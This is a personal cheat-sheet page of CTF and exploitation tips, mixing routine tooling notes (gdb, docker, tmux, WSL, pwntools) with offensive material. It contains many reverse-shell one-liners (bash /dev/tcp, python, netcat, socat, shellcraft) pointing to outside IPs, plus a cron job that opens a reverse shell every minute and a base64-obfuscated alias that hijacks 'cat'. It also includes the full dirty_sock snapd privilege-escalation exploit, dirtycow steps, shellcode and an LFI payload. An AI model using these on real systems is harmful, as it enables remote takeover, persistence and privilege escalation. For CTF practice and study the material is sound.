Document about little trick Updating

Start

gdb load debug source code

directory <path>

old-release

sed -i -r 's/security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list
sed -i -r 's/([a-z]{2}.)?archive.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list

seccomp & multi-process

balsn CTF: Asian Parents

https://bugs.chromium.org/p/project-zero/issues/detail?id=2276

get-pip

wget https://bootstrap.pypa.io/pip/2.7/get-pip.py

Compile ASM Code with GCC

  • Write asm code and compile it to obj file
  • Compile the c code to obj file
  • link them together
  • Use -no-pie --static to keep everything simple

sample code

get-pip

wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python ./get-pip.py

apt update with old-released

replace ubuntu/security with old-released

pwntools EOF

from pwn import *
p= process("./main",stdin=PTY,raw=False)
p.send(b'\4')#CEOF
p.interactive()
# p.sock.shutdown(socket.SHUT_RW)

init_array

void __attribute__((constructor))foo()
{
    ;
}

angr basic

import angr
p = angr.Project('./pwn', auto_load_libs=False)
state = p.factory.entry_state(add_options={angr.options.LAZY_SOLVES})
simgr = p.factory.simulation_manager(state)
simgr.explore(find=0, avoid=0)
print(simgr.found[0].posix.dumps(0))

reconstruct /dev/null

run as a root rm -f /dev/null; mknod -m 666 /dev/null c 1 3

socat reversed shell

https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat

socat tcp-l:4444,fork,reuseaddr exec:sh,pty,stderr,setsid,sigint,sane

python reversed shell

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('1.1.1.1',123445));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

pwntools can’t attach

pip install -U pwntools==4.8.0b0

Git SSL verify

git config --global http.sslverify false

Compact WSL vDisk

wsl --shutdown
diskpart
# open window Diskpart
select vdisk file="C:\Users\n132\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu20.04onWindows_79rhkp1fndgsc\LocalState\ext4.vhdx"
attach vdisk readonly
compact vdisk
detach vdisk
exit
# docker wsl
docker system prune -a -f
net stop com.docker.service
taskkill /F /IM "Docker Desktop.exe"
wsl --shutdown
Optimize-VHD -Path "C:\Users\n132\AppData\Local\Docker\wsl\data\ext4.vhdx" -Mode Full
wsl
net start com.docker.service

reversed shell

system:

# system(cmd),cmd=
/bin/bash -c 'bash -i >/dev/tcp/192.168.74.132/4444 0>&1'
bash -c 'exec bash -i &>/dev/tcp/<ip address>/<port> <&1';

python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

netcat:

nc 192.168.1.1 4444 | /bin/bash | nc 192.168.1.1 5555

Connection Check

  1. When you can run any command, Use sleep to hang the shell.
  2. Try p.read(even there is no responding data)

Python Figures

def graph(x1,y1,eb1,x2=None,y2=None,eb2=None,Name='Default.jpg'):
    fig = plt.figure()
    plt.errorbar(x1,y1,fmt='ro--',yerr=eb1,capsize=10,ecolor="red",alpha=0.5,label="Oracle")
    if(x2 and y2 and eb2):
        plt.errorbar(x2,y2,fmt='bo--',yerr=eb2,capsize=10,ecolor="blue",alpha=0.5,label="Orgr")
    plt.xlabel("Number of choice", fontdict=font)
    plt.ylabel("Time Cost in s", fontdict=font)
    plt.title("Time Cost for Per Run (What if we have more than 5 choice)", fontdict=font)
    plt.legend(loc='upper left',fontsize=20)
    plt.show()

git commit amend

git commit --amend --date "Sun Dec 4 20:35:02 EST 2021"

multithread exp

from threading import Thread
from os import system
from pwn import *
def wrapper(i):
	try:
		for x in range(0x40):
			if(x%0x10==i):
				system("python ./eax.py {}".format(x))
	except:
		print("AP")
tab= []
for x in range(0x10):
	tab.append(Thread(target= wrapper, args=(x,)))
for x in range(0x10):
	tab[x].start()
while(1):
	sleep(0x10)

reverse shell - shellcode

shellcode = asm(shellcraft.connect('112.74.38.118',6999)+shellcraft.dupsh())

LD_PRELOAD multi-lib

export LD_PRELOAD = "A.so b.so"

mmap

mmap(address,0x1000,0x7,0x22,0,0)

default buffer (STDOUT)

fllush by fill the buffer (which may be as large as 0xe00)

Github Action

Permission denied. git update-index --chmod=+x ./.github/scripts/backend_decrypt.sh

Linux ncat 部署服务

ncat -vc ./test -l 1024

比特,字节,字,双字,四字

八个比特(Bit)称为一个字节(Byte),两个字节称为一个字(Word),两个字称为一个双字(Dword),两个双字称为一个四字(Qword)。 db byte dw world dd double-world dq quad-world

atoi()

将参数认为是str,小于0x30被认为是0 返回str代表的十进制int

__environ

libc.symbols[‘__environ’]上存着栈地址 只要泄露了libc地址就可以通过__environ 获得栈地址 在relro全开不能写got的时候就可以尝试通过控制执行流来控制程序

trick for no_output

当没有直接泄露的时候 可以将可以控制参数函数A替换成输出函数B 主要做法是将A的got换成plt[B]+6 也就是相当于调用了B但是参数依旧是原来的参数

Ubuntu 开关ASLR

sudo sh -c “echo 2 > /proc/sys/kernel/randomize_va_space

process_stdin

default 为pipe 管道 半双工 可以设置为pty 伪终端 例如:p=process(“./doublefree”,stdin=process.PTY) 如果写入的数据没有换行符,就可能不会被传送到另一端, 造成读端一直阻塞 linux终端

process()环境变量

想要用出题方的libc可以用 env = {“LD_PRELOAD”: “./libc.so.6”} env=env

来设置环境变量

gdb_goto

goto 直接跳到某行 中间的代码相当于没有执行 可以在调试的时候跳过sleep之类的函数。

gdb_set

可以在调试的时候通过set来改变指定未知的值 可以是地址可以是参数 例如

set $rax=0x10
set *0xffffce40=0x20

gdb_SIGALRM

直接调试的时候可以关闭alarm() handle SIGALRM nopass

ssh

sudo apt-get install openssh-server

alarm

IDA patch 掉 alarm,system(“sleep ?”) #patch之前改一下option->general->opcode 用IDA->edit->patch program->change …->apply

IDA Shortcut

rename====>n undef=====>u xref======>x goto======>g def=======>y search string=>option+t change sp==>option+k

GDB sizeof

p sizeof(_IO_FILE)

fmt_leak

做fmtstr时可以用的一个gadget方便泄露

def fmt_leak(lenth):
	for x in range(1,lenth):
		payload="%{}$p".format(str(x))
		p.sendline(payload)
		data=p.readline()
		if (data=="(nil)\n"):
			data="0x0"
		data=(int(data,16))
		log.success("%sth=============>%s",str(x),hex(data))

ELF->”/bin/sh”

libc.search("/bin/sh").next() ## shellcode

context.arch='amd64'
shcode=asm(shellcraft.sh())

Partial Write Burp

#!/bin/bash
for i in `seq 1 5000`; do python exp.py; done;

uninitialized variable

堆栈的内容可能被之前的函数控制

遗留数据导致泄露

malloc时候没有memset 而且写入数据没有用0截断

arm & mips 环境

link qemu指定lib路径例如: qemu-mipsel -L /usr/mipsel-linux-gnu/ ./add qemurun后调试: qemu-mipsel -g 1234 -L /usr/mipsel-linux-gnu/ ./add

sysmalloc

两个assert

old_size >= 0x1f
old_top &0x1=1
old_end is the end of page
old_size < nb+MINSIZE

IO_FILE Payload

#32 bits
fake_file = "/bin/sh\x00" + "\x00" * 0x40 + p32(fake_lock_addr)
fake_file = fake_file.ljust(0x94, "\x00")
fake_file += p32(fake_vtable_addr - 0x44)

#64 bits
fake_file = "/bin/sh\x00" + '\x00' * 0x8
fake_file += p64(system) + '\x00' * 0x70
# the system can also be placed in other memory
fake_file += p64(fake_lock_addr)
fake_file = fake_file.ljust(0xd8, '\x00')
fake_file += p64(buf_addr + 0x10 - 0x88) # fake_vtable_addr

pwn 远端 命令被ban

尝试cat flag >&0 /输出重定向到stdin …/ stdin也是可以用来输出的。

系统调用表

x64系统调用表 x86系统调用表

github提速

sudo vim /etc/hosts 添加 github.com,github.global.ssl.fastly.net 的ip

qira

github 上安装 按照shellfish的师傅的pull改 link

dmesg

dmesg用来显示内核环缓冲区(kernel-ring buffer)内容

echo -e

“\033[{};{};{}m n132 \033[0m”.format(字类型,字颜色,背景颜色) sample: “\033[1;31;40m n132»> \033[0m”

echo $?

用于输出上一个程序的退出码

gcc 内嵌汇编规则

https://akaedu.github.io/book/ch19s05.html

ld:自定义入口 arch

ld -m elf_i386 -static -e n132 -o nier tiny.o one demo

char str[5]="nier\n";
void say()
{
    asm("movl %%eax,%%ecx\n\t"
        "movl $4,%%eax \n\t"
        "movl $1,%%ebx \n\t"
        "movl $5,%%edx \n\t"
        "int $0x80 \n\t"
        ::"r"(str):"ebx","ecx","edx"
        );
}
void exit()
{
    asm(
        "movl $1,%eax\n\t"
        "int $0x80\n\t"
        );
}
int n132()
{
    say();
    exit();
    return 0;
}

python socket+dup弹shell

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("127.0.0.1",12345))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh",'-i'])

做kidding的时候看到的…原来还可以复制stdXXX到socket

gdb b

关于gdb的断点今天被上了一课… x64断点最好不要断在某些奇怪的gadget上(被截断产生的gadget) rsp_r13_r14_r15= 0x00000000004005bd rbx_rbp_r12_r13_r14_r15_ret= 0x0000000004005BA 这样就导致程序运行出现问题

c++filt

可以将linux下编译过的函数名称转化为原始名称

.tmux.conf

从swing师傅那边抄的..

set -g prefix C-a
set -g default-terminal "screen-256color"
set-window-option -g mode-keys vi
bind h select-pane -L
bind j select-pane -D
bind k select-pane -U
bind l select-pane -R
unbind %
bind \ split-window -h
bind - split-window -v
set -g mouse-utf8 on
set -g mouse on

unbind C-b


## 设置环境变量
```python
import os

os.environ={
    ...
}

eviron

.IMPORTANT critical~~

buffer over flow

gcc 4.9以上 编译简单bof时main会利用ecx/rcx确定rsp

   0x80488b7 <main+59>                   mov    ecx, dword ptr [ebp - 4]
   0x80488ba <main+62>                   leave  
   0x80488bb <main+63>                   lea    esp, [ecx - 4]
   0x80488be <main+66>                   ret    

利用时可以利用 改ebp-4的值 然后跳到buffer上的 rop..

ssh download

scp root@51.254.114.246:/home/tmp/tmp .

(CVE-2019-7304)提权


#!/usr/bin/env python3
#snapd < 2.37
#python3
#ssh-keygen -t rsa -C "111@qq.com"
#cat ~/.ssh/id_rsa.pub#add to `https://login.ubuntu.com/`
#python3 poc.py -u "3385516880@qq.com" -k "../.ssh/id_rsa.pub"
"""
Local privilege escalation via snapd, affecting Ubuntu and others.
v1 of dirty_sock leverages the /v2/create-user API to create a new local user
based on information in an Ubuntu SSO profile. It requires outbound Internet
access as well as the SSH service running and available from localhost.
Try v2 in more restricted environments, but use v1 when possible.
Before running v1, you need to:
    - Create an Ubuntu SSO account (https://login.ubuntu.com/)
    - Login to that account and ensure you have your public SSH key configured
      in your profile.
Run exploit like this:
    dirty_sock.py -u <account email> -k <ssh priv key file>
A new local user with sudo rights will be created using the username from your
Ubuntu SSO profile. The SSH public key will be copied into this users profile.
The exploit will automatically SSH into localhost when finished.
Research and POC by initstring (https://github.com/initstring/dirty_sock)
"""

import argparse
import string
import random
import socket
import re
import sys
import os

BANNER = r'''
      ___  _ ____ ___ _   _     ____ ____ ____ _  _ 
      |  \ | |__/  |   \_/      [__  |  | |    |_/  
      |__/ | |  \  |    |   ___ ___] |__| |___ | \_ 
                       (version 1)
//=========[]==========================================\\
|| R&D     || initstring (@init_string)                ||
|| Source  || https://github.com/initstring/dirty_sock ||
|| Details || https://initblog.com/2019/dirty-sock     ||
\\=========[]==========================================//
'''


def process_args():
    """Handles user-passed parameters"""
    parser = argparse.ArgumentParser()
    parser.add_argument('--username', '-u', type=str, action='store',
                        required=True, help='Your Ubuntu One account email.')
    parser.add_argument('--key', '-k', type=str, action='store',
                        required=True, help='Full path to the ssh privkey'
                        ' matching the pubkey in your Ubuntu One account.')

    args = parser.parse_args()

    if not os.path.isfile(args.key):
        print("[!] That key file does not exist. Please try again.")
        sys.exit()

    return args

def create_sockfile():
    """Generates a random socket file name to use"""
    alphabet = string.ascii_lowercase
    random_string = ''.join(random.choice(alphabet) for i in range(10))
    dirty_sock = ';uid=0;'

    # This is where we slip on the dirty sock. This makes its way into the
    # UNIX AF_SOCKET's peer data, which is parsed in an insecure fashion
    # by snapd's ucrednet.go file, allowing us to overwrite the UID variable.
    sockfile = '/tmp/' + random_string + dirty_sock

    print("[+] Slipped dirty sock on random socket file: " + sockfile)

    return sockfile

def bind_sock(sockfile):
    """Binds to a local file"""
    # This exploit only works if we also BIND to the socket after creating
    # it, as we need to inject the dirty sock as a remote peer in the
    # socket's ancillary data.
    print("[+] Binding to socket file...")
    client_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    client_sock.bind(sockfile)

    # Connect to the snap daemon
    print("[+] Connecting to snapd API...")
    client_sock.connect('/run/snapd.socket')

    return client_sock

def add_user(args, client_sock):
    """Main exploit function"""
    post_payload = ('{"email": "' + args.username +
                    '", "sudoer": true, "force-managed": true}')
    http_req = ('POST /v2/create-user HTTP/1.1\r\n'
                'Host: localhost\r\n'
                'Content-Length: ' + str(len(post_payload)) + '\r\n\r\n'
                + post_payload)

    # Send our payload to the snap API
    print("[+] Sending payload...")
    client_sock.sendall(http_req.encode("utf-8"))

    # Receive the data and extract the JSON
    http_reply = client_sock.recv(8192).decode("utf-8")

    # Try to extract a username from the valid reply
    regex = re.compile(r'"status":"OK","result":{"username":"(.*?)"')
    username = re.findall(regex, http_reply)

    # If exploit was not successful, give details and exit
    if '"status":"Unauthorized"' in http_reply:
        print("[!] System may not be vulnerable, here is the API reply:\n\n")
        print(http_reply)
        sys.exit()

    if 'cannot find user' in http_reply:
        print("[!] Could not find user in the snap store... did you follow"
              " the instructions?")
        print("Here is the API reply:")
        print(http_reply)
        sys.exit()

    if not username:
        print("[!] Something went wrong... Here is the API reply:")
        print(http_reply)
        sys.exit()

    # SSH into localhost with our new root account
    print("[+] Success! Enjoy your new account with sudo rights!")
    cmd1 = 'chmod 600 ' + args.key
    cmd2 = 'ssh ' + username[0] + '@localhost -i ' + args.key
    os.system(cmd1)
    os.system(cmd2)

    print("[+] Hope you enjoyed your stay!")
    sys.exit()



def main():
    """Main program function"""

    # Gotta have a banner...
    print(BANNER)

    # Process the required arguments
    args = process_args()

    # Create a random name for the dirty socket file
    sockfile = create_sockfile()

    # Bind the dirty socket to the snapdapi
    client_sock = bind_sock(sockfile)

    # Exploit away...
    add_user(args, client_sock)

    # Remove the dirty socket file
    os.remove(sockfile)


if __name__ == '__main__':
    main()

概率性脚本 连续化

加一行read如果eof会直接close掉

    p.sendline("cat flag")
	data=p.readline()
	if "xctf" in data:
		print 1
		f=open("./flag.txt","w")
		f.write(data)
		f.close()

SROP

sig=SigreturnFrame()

signal

signal(SIGALARM,func)

python deepcopy

import copy copy.deepcopy(path) 复制整个内容而不是指针

IDA rebase

EDIT-->segment->rebase 发现开pie时候地址不好找有了这个ida+gdb调试起来更加方便了.

https://paper.seebug.org/255/#5-last_remainder

关于 malloc&free

主机发现

nmap -sn 192.168.22.0/24

AWD_Frame DF

权限设置

  • find /var/www/html -type d -writable xargs chmod 755
  • find /var/www/html -type f -writable | xargs chmod 644

    监控是否被传文件

    python watch.py path

    偷梁换柱

    alias cat='python -c "exec(\"aW1wb3J0IHRpbWUKaW1wb3J0IHN5cwppbXBvcnQgaGFzaGxpYgppbXBvcnQgb3MKaWYgbGVuKHN5cy5hcmd2KSA+IDEgYW5kICJmbGFnIiBpbiAiIi5qb2luKHN5cy5hcmd2KToKCXByaW50ICJmbGFneyVzfSIgJSAoaGFzaGxpYi5tZDUoc3RyKGludCh0aW1lLnRpbWUoKS82MC8xMCkpKS5oZXhkaWdlc3QoKSkKZWxzZToKCW9zLnN5c3RlbSgiY2F0ICIrIiAiLmpvaW4oc3lzLmFyZ3ZbMTpdKSkK\".decode(\"base64\"))"'
    

    定时任务

    echo "* * * * * /bin/bash -c 'bash -i >/dev/tcp/192.168.22.1/4444 0>&1'"|crontab
    #每分钟上线报到
    

    dirty_cow

    sudo adduser test
    git clone https://github.com/dirtycow/dirtycow.github.io
    cd dirtycow.github.io
    gcc dirtyc0w.c -o dirtycow -Wall -pthread
    ./dirtycow /etc/group “$(sed ‘/\(sudo*\)/ s/$/,test/’ /etc/group)”
    

nasm编译

nasm -f elf exit.asm

#x86
ld -o exiter exit.o
#x64
ld -m elf_i386 -o exit exit.o

可见字符shellcode

PYj0X40PPPPQPaJRX4Dj0YIIIII0DN0RX502A05r9sOPTY01A01RX500D05cFZBPTY01SX540D05ZFXbPTYA01A01SX50A005XnRYPSX5AA005nnCXPSX5AA005plbXPTYA01Tx

ld & libc

用上题目的ldlibc

ld===>Ld

先把ld.so cp到/lib64/Ld-linux-x86-64.so.2 把程序内的/lib64/ld-linux-x86-64.so.2改为/lib64/Ld-linux-x86-64.so.2 然后设置LD_PRELOAD加载libc

看雪老哥强行解决法

https://bbs.pediy.com/thread-225849-1.htm

def change_ld(binary, ld):
    """
    Force to use assigned new ld.so by changing the binary
    """
    if not os.access(ld, os.R_OK): 
        log.failure("Invalid path {} to ld".format(ld))
        return None
 
         
    if not isinstance(binary, ELF):
        if not os.access(binary, os.R_OK): 
            log.failure("Invalid path {} to binary".format(binary))
            return None
        binary = ELF(binary)
 
 
    for segment in binary.segments:
        if segment.header['p_type'] == 'PT_INTERP':
            size = segment.header['p_memsz']
            addr = segment.header['p_paddr']
            data = segment.data()
            if size <= len(ld):
                log.failure("Failed to change PT_INTERP from {} to {}".format(data, ld))
                return None
            binary.write(addr, ld.ljust(size, '\0'))
            if not os.access('/tmp/pwn', os.F_OK): os.mkdir('/tmp/pwn')
            path = '/tmp/pwn/{}_debug'.format(os.path.basename(binary.path))
            if os.access(path, os.F_OK): 
                os.remove(path)
                info("Removing exist file {}".format(path))
            binary.save(path)    
            os.chmod(path, 0b111000000) #rwx------
    success("PT_INTERP has changed from {} to {}. Using temp file {}".format(data, ld, path)) 
    return ELF(path)
#example
elf = change_ld('./pwn', './ld.so')
p = elf.process(env={'LD_PRELOAD':'./libc.so.6'})

模拟实际环境

docker 或者 download 一个一样的…

gdb remote

  • 在ida的安装目录下找到linux_server64 复制一份到ubuntu要调试demo目录下运行
  • 在ida的菜单栏下方功能栏中的绿色小箭头处选择调试环境
  • 菜单栏中debuger下拉选择process option
  • application和inputfile位置都是ubuntu里demo路径 例如/tmp/demo
  • deretory 为ubuntu中demo的path 例如/tmp
  • host name 填目标ip 端口是linux_server64运行后显示的端口
  • 需要密码的填passwd
  • 保存好点击绿色小箭头就可以开始调试

bind a reload key

bind R source-file ~/.tmux.conf ; display-message “Config reloaded..”

set-option -g mouse on

context.terminal = ['tmux', 'splitw', '-h']

docker container —> image

sudo docker commit eafd9111ada6 docker/lua

docker-compose

docker-compose up

docker dbg

docker-compose 里加上

    cap_add:
        - SYS_PTRACE

或者 docker run --cap-add=SYS_PTRACE

docker exec -it ID /bin/bash

attach 没反应可以用 docker exec -it ID /bin/bash 来进入container

docker

curl -fsSL https://get.docker.com -o get-docker.sh
sudo sh get-docker.sh
sudo usermod -aG docker n132
sudo apt-get install python-pip
sudo pip install docker-compose

docker 特权模式

run 时增加参数 --privileged

docker save&load

docker save -o name n132/ubuntu:16.04 docker load< name

docker pull 加速

https://cr.console.aliyun.com/cn-hangzhou/instances/mirrors

keystone & keypatch For mac

https://github.com/fjh658/keystone-engine https://github.com/keystone-engine/keypatch

git clone https://github.com/fjh658/keystone-engine.git
cd keystone-engine
git submodule update --init --recursive
sudo python setup.py install --verbose
cp -rf  /usr/local/lib/python2.7/site-packages/keystone /Applications/IDA\ Pro\ 7.0/ida.app/Contents/MacOS/python/
brew install cmake 
...

ascii<=>shellcode

https://nets.ec/Ascii_shellcode

open_ssl

https://tanwenbo.top/course/ubuntu-16-04-%E6%9B%B4%E6%96%B0openssl%E8%87%B31-1-1.html

fit()

pwntools里的一个函数用于构造string,chunk fit(f,filler=’\x00’)

f={
    pos:value
}

例如

f={
    0x8:0x4a1,
    0x4a8:0x21,
    0x4c8:0x21
}
chunk=fit(f,filler='\x00')

tmux 同时操作多个终端

:set -g synchronize-panes on

ubuntu17.04 :apt-get update failing on 17.04

echo "deb http://old-releases.ubuntu.com/ubuntu/ zesty main restricted universe multiverse">/etc/apt/sources.list
echo "deb http://old-releases.ubuntu.com/ubuntu/ zesty-updates main restricted universe multiverse">>/etc/apt/sources.list
echo "deb http://old-releases.ubuntu.com/ubuntu/ zesty-security main restricted universe multiverse">> /etc/apt/sources.list

multi-libc

usage : bash build.sh verison » bash build.sh 2.25 https://github.com/ray-cp/pwn_debug/blob/master/build.sh

#!/bin/sh

# install som lib
echo "install som lib"
sudo apt-get install gawk -y
sudo apt-get install bison -y
sudo apt-get install gcc-multilib -y
sudo apt-get install g++-multilib -y

cd /
sudo mkdir -p /glibc
cd /glibc
sudo mkdir -p source
cd source


# get the source of glibc
Get_Glibc_Source(){
    if [ ! -d "/glibc/source/glibc-"$1 ]; then
        sudo wget http://mirrors.ustc.edu.cn/gnu/libc/glibc-$1.tar.gz
        sudo tar xf glibc-$1.tar.gz
    else
        echo "[*] /glibc/source/glibc-"$1" already exists..."
    fi
    
}
Install_Glibc_x64(){

    if [ -f "/glibc/x64/"$1"/lib/libc-"$1".so" ];then
        echo "x64 glibc "$1" already installed!"
        return
    fi

    #echo $1
    #echo "/glibc/x64/"$1"/lib/libc-"$1".so"
    sudo mkdir -p /glibc/x64/$1
    #wget http://mirrors.ustc.edu.cn/gnu/libc/glibc-$1.tar.gz
    #tar xf glibc-$1.tar.gz
    cd glibc-$1
    sudo mkdir build
    cd build
    sudo ../configure --prefix=/glibc/x64/$1/ --disable-werror --enable-debug=yes
    sudo make
    sudo make install
    cd ../../
    #sudo rm glibc-$1.tar.gz
    sudo rm -rf ./glibc-$1/build

}


Install_Glibc_x86(){

    if [ -f "/glibc/x86/"$1"/lib/libc-"$1".so" ];then
        echo "x86 glibc "$1" already installed!"
        return
    fi

    #echo $1
    #echo "/glibc/x64/"$1"/lib/libc-"$1".so"
    sudo mkdir -p /glibc/x86/$1
    #wget http://mirrors.ustc.edu.cn/gnu/libc/glibc-$1.tar.gz
    #tar xf glibc-$1.tar.gz
    #cd x86
    cd glibc-$1
    sudo mkdir build
    cd build
    sudo ../configure --prefix=/glibc/x86/$1/ --disable-werror --enable-debug=yes --host=i686-linux-gnu --build=i686-linux-gnu CC="gcc -m32" CXX="g++ -m32" 
    sudo make
    sudo make install
    cd ../../
    #sudo rm glibc-$1.tar.gz
    sudo rm -rf ./glibc-$1/build

}

#delte the tar of glibc
Delete_Glibc_Tar() {
    sudo rm glibc-$1.tar.gz
}

GLIBC_VERSION=$1
#echo ${GLIBC_VERSION}
if [ -n "$GLIBC_VERSION" ]; then
    #echo 1
    #cd x64
    Get_Glibc_Source $GLIBC_VERSION
    Install_Glibc_x64 $GLIBC_VERSION
    #cd ..
    #cd x86
    Install_Glibc_x86 $GLIBC_VERSION
    Delete_Glibc_Tar $GLIBC_VERSION
    #cd ..
else
    for GLIBC_VERSION in '2.19' '2.23' '2.24' '2.25' '2.26' '2.27' '2.28' '2.29'
    do
        #echo 2
        #cd x64
        Get_Glibc_Source $GLIBC_VERSION
        Install_Glibc_x64 $GLIBC_VERSION
        #cd ../x86
        Install_Glibc_x86 $GLIBC_VERSION
        Delete_Glibc_Tar $GLIBC_VERSION
        #cd ..
    done
fi

fmtstr + partial relro + no pie

(hijack the got to reuse )

base64 in ubuntu

  Desktop echo 123 | base64   
MTIzCg==
  Desktop echo MTIzCg== | base64 -d   
123

$?

上次执行的返回值只有一个字节.

stdlib-qsort

快速排序…看stdlib的时候发现还有这个….

#include<stdio.h>
#include<stdlib.h>
int cmp(int* a,int* b)
{
return *a-*b;
}
int main()
{
int a[5]={1,3,5,2,4};
qsort(a,5,sizeof(int),cmp);
for(int i=0;i<5;i++)
printf("%d\n",a[i]);
}

hlt

停止…halt

FORTIFY

gcc main.c -o main -O2 -FORTIFY_SOURCR=2

shellcode 遍历search

257号调用+ 78号调用

docker run with privileg

docker run -it --security-opt seccomp=unconfined --privileged --cap-add=SYS_PTRACE 81bcf752ac3d /bin/bash

tmux 语言问题

apt search locales apt install locales-all

gmpy2

各种系统上安装 https://www.bbsmax.com/A/xl56XDvrzr/

virtaulenv

安装:pip install virtualenv 创建环境: virtualenv name 使用环境: ./bin/activate 推出环境: deactivate

virtualenvwrapper

创建基本环境:mkvirtualenv [环境名] 删除环境:rmvirtualenv [环境名] 激活环境:workon [环境名] 退出环境:deactivate 列出所有环境:workon 或者 lsvirtualenv -b

zsh

apt install git wget zsh wget https://github.com/robbyrussell/oh-my-zsh/raw/master/tools/install.sh -O - | sh chsh -s /bin/zsh

install jave on ubuntu

apt-get install openjdk-8-jdk vim /etc/profile

#set java environment
JAVA_HOME=/usr/lib/jvm/java-1.7.0-openjdk-amd64
JRE_HOME=$JAVA_HOME/jre
CLASS_PATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib
PATH=$PATH:$JAVA_HOME/bin:$JRE_HOME/bin
export JAVA_HOME JRE_HOME CLASS_PATH PATH

linux -kernel

解开文件系统: gunzip core.cpio.gz && cpio -idmv < core.cpio 重新打包 find . | cpio -o --format=newc > rootfs.cpio 设置架构 set architecture i386:x86-64:intel

openssl aes

从私钥文件中提取公钥 openssl rsa -in test.key -pubout -out test_pub.key 查看公钥 openssl rsa -pubin -in pubkey.pem -text -modulus 公钥加密 openssl rsautl -encrypt -in hello -inkey test_pub.key -pubin -out hello.en 私钥解密 openssl rsautl -decrypt -in hello.en -inkey test.key -out hello.de

RSATOOLS生成私钥

rsatools生成私钥 ./rsatool.py -p 965445304326998194798282228842484732438457170595999523426901 -q 863653476616376575308866344984576466644942572246900013156919 -o p.k

php 伪协议

?page=php://filter/read=convert.base64-encode/resource=index.php

带openssl/xxx 库函数的程序编译时

编译时候加 -lcrypto

RC4

from Crypto.Cipher import ARC4
rc4=ARC4.new('dubhecrypto')
enc='AErR8FeduXbQTwyK05amnT2uDu25TQ=='
print rc4.decrypt(enc.decode('base64'))

ssr

apt update
apt install wget 
wget https://raw.githubusercontent.com/n132/banana/master/Misc/ssr/ssr.sh
chmod +x ./ssr.sh
./ssr.sh

npm install

npm install --unsafe-perm=true --allow-root

one_gadget

发现一个新套路 就是malloc_hook改成realloc+n,__realloc_hook改成one_gadget 发现double_free触发居然还有不稳的时候.

文件描述符

程序通过文件描述符来找到文件.(File No)

strace

追踪指定pid的程序的系统调用 strace -o output.txt -T -tt -e trace=all -p {pid}

signal

信号表 https://code.woboq.org/userspace/glibc/bits/signum-generic.h.html#50

DynELF

def leak(address):
    data = p.read(address, 4)
    log.debug("%#x => %s" % (address, (data or '').encode('hex')))
    return data
d = DynELF(leak, elf=ELF("./pwn"))

注意printf(“%s”)可能会被\x00截断

线下赛AWD路由表配置

https://xuanxuanblingbling.github.io/ctf/tools/2019/08/04/route/

sudo route delete 0.0.0.0                                           # 删除默认路由
sudo route add -net 0.0.0.0 {公网网关 例如192.168.182.1}              # 添加公网网关
route -n add -net 10.10.0.0 -netmask 255.255.0.0 10.10.10.1         # 添加 10.10.0.0/16 网段的路由
route -n add -net 192.168.1.0 -netmask 255.255.255.0 10.10.10.1     # 添加 192.168.1.0/24 网段的路由

线下赛 tee/流量抓取

mv ./pwn /tmp/binary
echo "tee -a /tmp/in | /tmp/binary | tee -a /tmp/out " > /tmp/waf
mv /tmp/waf ./pwn
chmod +x pwn

tee -a date +%secho in | ./pwn | tee -a date +%secho out

asm coding on Visual Studio

env setup : link

win32 asm

proto: 过程声明伪指令 invoke: 过程调用伪指令

长度拓展

CBW 字节转换为字. (把AL中字节的符号扩展到AH中去)
CWD 字转换为双字. (把AX中的字的符号扩展到DX中去)
CWDE 字转换为双字. (把AX中的字符号扩展到EAX中去)
CDQ 双字扩展. (把EAX中的字的符号扩展到EDX中去)

armpwn

qemu

apt-get install qemu

lib

sudo apt-get install -y gcc-arm-linux-gnueabi

run

qemu-arm -g 1234 -L /usr/arm-linux-gnueabi ./pwn

debug

gdb-multiarch pwn remote target remote:1234

patch & diff

产生补丁文件: diff -uN ./a ./b > patch 应用补丁文件: patch -p0 < patch 这里的p0表示当前目录.如p1表示上一级.

MIPS or MIPSEL

compile

sudo apt-get install linux-libc-dev-mipsel-cross 
sudo apt-get install libc6-mipsel-cross libc6-dev-mipsel-cross
sudo apt-get install binutils-mipsel-linux-gnu gcc-mipsel-linux-gnu
sudo apt-get install g++-mipsel-linux-gnu

IEEE754

from decimal import *
def _bin_idx(sig,i):
    if(sig&(1<<i)!=0):
        return 1
    else:
        return 0
def n132_pow(a,b):
    if b == 0:
        return Decimal(1)
    aa = Decimal(a)
    bb = Decimal(b)
    if(bb<0):
        aa = Decimal(1) / Decimal(a)
        bb = -bb
    res = aa
    for x in range(bb-1):
        res*=aa
    return res
def _sum_significand(sig):
    res = Decimal(0)
    for x in range(1,53):
        res+=n132_pow(2,-x)*Decimal(_bin_idx(sig,52-x))
    return res

def u2d(addr=0x555555770000,log=0):
    sign = addr>>63
    exponent = (addr&(0x7fffffffffffffff))>>52
    significand= ((addr&0x000fffffffffffff))
    value = n132_pow(-1,sign) * n132_pow(2,exponent-1022) * _sum_significand(significand)
    if(log):
        print("Sign: "+hex(sign))
        print("Exponent: "+hex(exponent))
        print("Significand: "+hex(significand))
        print("Double (IEEE 754): ")
        print(value)
    return value
getcontext().prec = 50
if __name__ == "__main__":
    u2d()